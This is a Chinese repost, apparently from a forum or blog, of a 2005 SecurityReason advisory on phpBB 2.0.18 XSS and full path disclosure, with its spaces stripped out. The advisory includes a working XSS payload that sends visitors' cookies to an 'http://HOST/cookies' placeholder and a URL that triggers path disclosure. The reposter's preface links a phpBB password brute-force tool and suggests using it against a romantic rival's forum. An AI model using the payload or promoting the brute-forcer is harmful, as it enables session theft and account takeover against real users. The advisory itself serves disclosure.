phpBB2.0.18XSSandFullPathDisclosure

Details:SecurityAlert

还有一个是暴力破解的工具，单线程的，也没有大用处,实在情敌开了个什么phpbb什么的也可以拿来跑密码

下载:http://ftpzhangxue.w205.100dns.com/tools/phpbb.rar

Topic:phpBB2.0.18XSSandFullPathDisclosure

SecurityAlertId:269

SecurityRisk:Low

RemoteExploit:Yes

LocalExploit:No

ExploitGiven:Yes

Credit:MaksymilianArciemowicz

Date:17.12.2005

AffectedSoftware:phpBB<=2.0.18

AdvisoryText:

-----BEGINPGPSIGNEDMESSAGE-----

Hash:SHA1

[phpBB2.0.18XSSandFullPathDisclosurecXIb8O3.22]

Author:MaksymilianArciemowicz(cXIb8O3)

Date:16.12.2005

fromsecurityreason.comTEAM

----0.Description---

phpBBisahighpowered,fullyscalable,andhighlycustomizableOpenSourcebulletinboar

dpackage.phpBBhasauser-friendlyinterface,simpleandstraightforwardadministration

panel,andhelpfulFAQ.BasedonthepowerfulPHPserverlanguageandyourchoiceofMySQL

,MS-SQL,PostgreSQLorAccess/ODBCdatabaseservers,phpBBistheidealfreecommunityso

lutionforallwebsites.

Contactwithauthorhttp://www.phpbb.com/about.php.

----1.XSS---

IfinphpbbisAllowedHTMLtags"ON"likeb,i,u,preandhaveyouinprofile"Alwaysal

lowHTML:YES"orareyouGuest

thatyoucanusethistags:

<BC=">"onmouseover="alert('SecurityReason.Com')"X="<B">HELO</B>

Exploit:

<BC=">"onmouseover="alert(document.location='http://HOST/cookies?'+document.cookie)

"X="<B">HALO</B>

andhaveyoucookies.

----2.FullPathDisclosure---

Infileadmin/admin_disallow.phpis

--25-31---

if(!empty($setmodules))

{

$filename=basename(__FILE__);

$module['Users']['Disallow']=append_sid($filename);

return;

}

--25-31---

functionappend_sid()dosen'texists.Andifyouhave:

register_globals=On

display_errors=On

Trytogo:

http://[HOST]/[DIR]/admin/admin_disallow.php?setmodules=1

--RESULTERROR---

Fatalerror:Calltoundefinedfunction:append_sid()in/www/2018/phpBB2/admin/admin_disa

llow.phponline28

--RESULTERROR---

----3.Greets---

sp3x

----4.Contact---

Author:MaksymilianArciemowicz<cXIb8O3>

Email:max[at]jestsuper[dot]plorcxib[at]securityreason[dot]com

GPG:http://securityreason.com/key/Arciemowicz.Maksymilian.gpg

securityreason.comTEAM

-----BEGINPGPSIGNATURE-----

Version:GnuPGv1.4.2(FreeBSD)

iD8DBQFDpDtC3Ke13X/fTO4RAosCAJkBcYRNbHKDGeuwnY1U/WXMhzDnVQCgl39D

/0u14EN2sQAh1Bwu0yvT48Q=

=lsL8

-----ENDPGPSIGNATURE-----

哦,对了,最上面那个好象也许大概似乎我猜是这个意思:

个性签名:

您填写的个性签名自动附带在您的发表的文章底部。个性签名有512个字符的限制。

禁止HTML标签

允许风格标签

允许表情图标

找到可以“允许HTML标签”